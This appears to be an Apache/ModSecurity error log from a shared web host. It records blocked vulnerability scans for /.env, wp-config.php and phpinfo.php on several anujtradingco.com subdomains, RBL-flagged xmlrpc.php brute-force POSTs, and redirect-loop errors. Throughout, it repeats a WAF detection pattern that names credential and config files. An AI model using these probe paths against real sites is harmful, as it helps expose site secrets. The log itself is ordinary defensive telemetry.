[Tue May 26 17:27:26.374582 2026] [security2:error] [pid 882219:tid 882350] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKpp8tTkZcqimiXcQQWAAAAIY"], referer: https://www.anujtradingco.com/
[Tue May 26 17:27:26.688573 2026] [security2:error] [pid 882219:tid 882430] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKpp8tTkZcqimiXcQQUQAAANY"]
[Tue May 26 17:27:27.113238 2026] [security2:error] [pid 882219:tid 882369] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKp58tTkZcqimiXcQQgwAAAJk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1443956&moderation-hash=9164ad00ee6584c7e227ef699a9953b1
[Tue May 26 17:27:28.537958 2026] [security2:error] [pid 882219:tid 882411] [client 203.194.101.7:60726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKqJ8tTkZcqimiXcQQ1wAAAMM"]
[Tue May 26 17:27:28.538118 2026] [security2:error] [pid 882219:tid 882411] [client 203.194.101.7:60726] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKqJ8tTkZcqimiXcQQ1wAAAMM"]
[Tue May 26 17:27:29.136234 2026] [security2:error] [pid 882219:tid 882419] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKqJ8tTkZcqimiXcQQ6gAAAMs"]
[Tue May 26 17:27:29.696434 2026] [core:crit] [pid 882219:tid 882372] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:27:30.865734 2026] [security2:error] [pid 882219:tid 882373] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKqp8tTkZcqimiXcQRTwAAAJ0"]
[Tue May 26 17:27:32.154083 2026] [security2:error] [pid 882219:tid 882389] [client 91.92.42.86:16710] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "service.google.com.anujtradingco.com"] [uri "/.env"] [unique_id "ahWKrJ8tTkZcqimiXcQRiAAAAK0"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.169204 2026] [core:error] [pid 882219:tid 882451] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.169220 2026] [core:error] [pid 882219:tid 882451] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.223844 2026] [security2:error] [pid 882219:tid 882450] [client 91.92.42.86:16722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/phpinfo.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRjAAAAOo"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.245748 2026] [security2:error] [pid 882219:tid 882390] [client 91.92.42.86:16700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp-config.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRiQAAAK4"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.291431 2026] [security2:error] [pid 882219:tid 882369] [client 91.92.42.86:16732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/info.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRkAAAAJk"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.293985 2026] [core:error] [pid 882219:tid 882353] [client 91.92.42.86:16730] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.293999 2026] [core:error] [pid 882219:tid 882353] [client 91.92.42.86:16730] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.294316 2026] [core:error] [pid 882219:tid 882362] [client 91.92.42.86:16736] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.294335 2026] [core:error] [pid 882219:tid 882362] [client 91.92.42.86:16736] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.298494 2026] [core:error] [pid 882219:tid 882416] [client 91.92.42.86:16748] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.298513 2026] [core:error] [pid 882219:tid 882416] [client 91.92.42.86:16748] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.306706 2026] [security2:error] [pid 882219:tid 882467] [client 91.92.42.86:16710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/config.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRkgAAAPs"], referer: http://service.google.com.anujtradingco.com/
[Tue May 26 17:27:32.537563 2026] [security2:error] [pid 882219:tid 882432] [client 91.92.42.86:16768] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/info.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRmQAAANg"], referer: http://anujtradingco.com/
[Tue May 26 17:27:32.538129 2026] [security2:error] [pid 882219:tid 882372] [client 91.92.42.86:16766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/config.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRmgAAAJw"], referer: http://anujtradingco.com/
[Tue May 26 17:27:32.539299 2026] [security2:error] [pid 882219:tid 882415] [client 91.92.42.86:16770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/phpinfo.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRmwAAAMc"], referer: http://anujtradingco.com/
[Tue May 26 17:27:32.612954 2026] [security2:error] [pid 882219:tid 882359] [client 91.92.42.86:16796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-config.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRoAAAAI8"], referer: http://anujtradingco.com/
[Tue May 26 17:27:32.676879 2026] [security2:error] [pid 882219:tid 882476] [client 91.92.42.86:16786] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRnwAAAQQ"], referer: http://anujtradingco.com/
[Tue May 26 17:27:32.686856 2026] [security2:error] [pid 882219:tid 882413] [client 91.92.42.86:16826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/.env"] [unique_id "ahWKrJ8tTkZcqimiXcQRogAAAMU"], referer: http://anujtradingco.com/
[Tue May 26 17:27:32.713860 2026] [security2:error] [pid 882219:tid 882473] [client 91.92.42.86:16812] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRoQAAAQE"], referer: http://anujtradingco.com/
[Tue May 26 17:27:32.751959 2026] [security2:error] [pid 882219:tid 882420] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRpQAAAMw"], referer: http://anujtradingco.com/
[Tue May 26 17:27:32.843220 2026] [security2:error] [pid 882219:tid 882427] [client 91.92.42.86:16840] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "greenfood.anujtradingco.com"] [uri "/.env"] [unique_id "ahWKrJ8tTkZcqimiXcQRqQAAANM"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:32.876014 2026] [security2:error] [pid 882219:tid 882457] [client 91.92.42.86:16872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/wp-config.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRqgAAAPE"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:32.878085 2026] [security2:error] [pid 882219:tid 882349] [client 91.92.42.86:16856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/info.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRqwAAAIU"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:32.931263 2026] [core:error] [pid 882219:tid 882433] [client 91.92.42.86:16888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:32.931280 2026] [core:error] [pid 882219:tid 882433] [client 91.92.42.86:16888] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:32.964404 2026] [security2:error] [pid 882219:tid 882355] [client 91.92.42.86:16896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/config.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRrgAAAIs"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:32.983867 2026] [security2:error] [pid 882219:tid 882475] [client 91.92.42.86:16906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/info.php"] [unique_id "ahWKrJ8tTkZcqimiXcQRsQAAAQM"], referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.000948 2026] [core:error] [pid 882219:tid 882423] [client 91.92.42.86:16922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.000966 2026] [core:error] [pid 882219:tid 882423] [client 91.92.42.86:16922] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.001214 2026] [core:error] [pid 882219:tid 882455] [client 91.92.42.86:16840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:33.001236 2026] [core:error] [pid 882219:tid 882455] [client 91.92.42.86:16840] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:33.033195 2026] [security2:error] [pid 882219:tid 882421] [client 91.92.42.86:16930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "greenfood.anujtradingco.com"] [uri "/phpinfo.php"] [unique_id "ahWKrZ8tTkZcqimiXcQRtAAAAM0"], referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:33.040188 2026] [core:error] [pid 882219:tid 882439] [client 91.92.42.86:16942] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:33.040202 2026] [core:error] [pid 882219:tid 882439] [client 91.92.42.86:16942] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:33.054128 2026] [security2:error] [pid 882219:tid 882461] [client 91.92.42.86:16964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/wp-config.php"] [unique_id "ahWKrZ8tTkZcqimiXcQRtgAAAPU"], referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.054646 2026] [security2:error] [pid 882219:tid 882460] [client 91.92.42.86:16962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/phpinfo.php"] [unique_id "ahWKrZ8tTkZcqimiXcQRtwAAAPQ"], referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.064141 2026] [core:error] [pid 882219:tid 882402] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:33.064155 2026] [core:error] [pid 882219:tid 882402] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://greenfood.anujtradingco.com/
[Tue May 26 17:27:33.074944 2026] [core:error] [pid 882219:tid 882441] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.074958 2026] [core:error] [pid 882219:tid 882441] [client 91.92.42.86:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.104359 2026] [security2:error] [pid 882219:tid 882434] [client 91.92.42.86:16992] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "new.anujtradingco.com"] [uri "/.env"] [unique_id "ahWKrZ8tTkZcqimiXcQRvgAAANo"], referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.134177 2026] [security2:error] [pid 882219:tid 882378] [client 91.92.42.86:17008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "new.anujtradingco.com"] [uri "/config.php"] [unique_id "ahWKrZ8tTkZcqimiXcQRwgAAAKI"], referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.206976 2026] [core:error] [pid 882219:tid 882438] [client 91.92.42.86:17022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.206991 2026] [core:error] [pid 882219:tid 882438] [client 91.92.42.86:17022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.258579 2026] [core:error] [pid 882219:tid 882352] [client 91.92.42.86:16992] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.258599 2026] [core:error] [pid 882219:tid 882352] [client 91.92.42.86:16992] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://new.anujtradingco.com/
[Tue May 26 17:27:33.336361 2026] [security2:error] [pid 882219:tid 882350] [client 91.92.42.86:17046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/config.php"] [unique_id "ahWKrZ8tTkZcqimiXcQRywAAAIY"], referer: http://test.anujtradingco.com/
[Tue May 26 17:27:33.338581 2026] [security2:error] [pid 882219:tid 882369] [client 91.92.42.86:17058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/info.php"] [unique_id "ahWKrZ8tTkZcqimiXcQRzQAAAJk"], referer: http://test.anujtradingco.com/
[Tue May 26 17:27:33.378087 2026] [security2:error] [pid 882219:tid 882403] [client 91.92.42.86:17092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "test.anujtradingco.com"] [uri "/.env"] [unique_id "ahWKrZ8tTkZcqimiXcQRzwAAALs"], referer: http://test.anujtradingco.com/
[Tue May 26 17:27:33.391918 2026] [security2:error] [pid 882219:tid 882407] [client 91.92.42.86:17106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/wp-config.php"] [unique_id "ahWKrZ8tTkZcqimiXcQR0gAAAL8"], referer: http://test.anujtradingco.com/
[Tue May 26 17:27:33.438772 2026] [security2:error] [pid 882219:tid 882472] [client 91.92.42.86:17134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "test.anujtradingco.com"] [uri "/phpinfo.php"] [unique_id "ahWKrZ8tTkZcqimiXcQR1QAAAQA"], referer: http://test.anujtradingco.com/
[Tue May 26 17:27:33.570759 2026] [security2:error] [pid 882219:tid 882430] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKrZ8tTkZcqimiXcQRxQAAANY"]
[Tue May 26 17:27:34.129344 2026] [core:crit] [pid 882219:tid 882358] (13)Permission denied: [client 40.77.167.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:27:34.644230 2026] [core:crit] [pid 882219:tid 882468] (13)Permission denied: [client 40.77.167.49:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:27:35.398285 2026] [security2:error] [pid 882219:tid 882418] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKr58tTkZcqimiXcQR_wAAAMo"]
[Tue May 26 17:27:36.418709 2026] [security2:error] [pid 882219:tid 882394] [client 176.65.139.238:37754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.kingsclubbanquet.com"] [uri "/.env"] [unique_id "ahWKsJ8tTkZcqimiXcQSIwAAALI"]
[Tue May 26 17:27:36.440393 2026] [security2:error] [pid 882219:tid 882404] [client 223.235.98.214:17165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKsJ8tTkZcqimiXcQSJAAAALw"]
[Tue May 26 17:27:36.440484 2026] [security2:error] [pid 882219:tid 882404] [client 223.235.98.214:17165] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKsJ8tTkZcqimiXcQSJAAAALw"]
